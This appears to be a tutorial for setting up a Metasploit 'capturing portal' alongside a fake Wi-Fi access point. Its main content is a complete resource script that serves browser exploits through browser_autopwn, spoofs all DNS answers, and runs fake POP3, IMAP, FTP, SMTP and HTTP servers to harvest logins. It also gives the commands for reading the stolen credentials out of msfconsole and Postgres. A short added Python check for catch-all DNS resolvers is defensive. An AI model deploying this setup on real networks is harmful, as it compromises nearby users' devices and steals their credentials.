This section describes how to start a Metasploit capturing portal. It captures all DNS requests and redirects everything to a malicious web server fully loaded with exploits using the browser autopwn. It also captures logon credentials for several services (pop3, imap, ftp, smtp, http). Best used with the fake wifi AP tutorial :)
First you should create a startup script for metasploit in order to keep it simple.
nano /pentest/exploits/framework2/karma.rc
Put the following in it to capture pop3, imap, ftp, smtp, http and dns, and to start a malicious website full of exploits. All browsing probes will be redirected to this site by autopwn:
use auxiliary/server/browser_autopwn
setg SRVHOST 10.0.0.1
setg SRVPORT 55550
setg URIPATH /ads
setg LHOST 10.0.0.1
setg LPORT 45000
run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
set SRVPORT 21
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
Save the file, and start msfconsole. I like to manually start msfconsole, and then "resource karma.rc". If I start with msfconsole -r karma.rc, sometimes the autopwn forgets to load itself:
msfconsole
resource karma.rc
The captured info can be seen in msfconsole with the following commands:
hosts
services
vulns
notes
info
The captured info can also be seen in postgres with the following commands:
sudo -s
su postgres
psql msf_database_name
select * from notes;
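Seen from the client side, a resolver that redirects every DNS request, as described at the top of this page, also answers for names that cannot exist. The following check is an added example, not part of the original tutorial: it probes with random names under the reserved .invalid TLD and reports whether they resolve. The function names and the two constructed stand-in resolvers are assumptions made for illustration.

```python
import ipaddress
import secrets
import socket


def system_resolver(name):
    """Resolve via the OS resolver; return a set of addresses (empty if none)."""
    try:
        return {info[4][0].split("%")[0] for info in socket.getaddrinfo(name, None)}
    except (socket.gaierror, UnicodeError):
        return set()


def check_resolver(resolve=system_resolver, probes=4):
    """Ask for random names under .invalid, a reserved TLD that must never resolve."""
    answered = {}
    for _ in range(probes):
        name = secrets.token_hex(8) + ".invalid"
        addrs = set(resolve(name))
        if addrs:
            answered[name] = addrs
    seen = sorted(set().union(*answered.values()))
    if not answered:
        verdict = "ok"            # every probe failed, as it should
    elif len(answered) == probes and len(seen) == 1:
        verdict = "catch-all"     # every impossible name maps to one host
    else:
        verdict = "suspicious"    # some impossible names resolved
    return {
        "verdict": verdict,
        "answered": len(answered),
        "addresses": seen,
        "private": [a for a in seen if ipaddress.ip_address(a).is_private],
    }


# Constructed stand-ins so the check can be exercised offline.
def catch_all_resolver(name):
    return {"10.0.0.1"}           # same address the page uses as SRVHOST


def honest_resolver(name):
    return set()                  # behaves like a resolver returning NXDOMAIN


if __name__ == "__main__":
    print("constructed catch-all:", check_resolver(catch_all_resolver))
    print("system resolver:      ", check_resolver())
```

A "suspicious" verdict can also come from an ISP or captive portal that rewrites NXDOMAIN answers, so treat it as a reason to look closer rather than as proof.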
Links:
http://www.offensive-security.com/metasploit-unleashed/Attack_Analysis
http://resources.infosecinstitute.com/karmetasploit/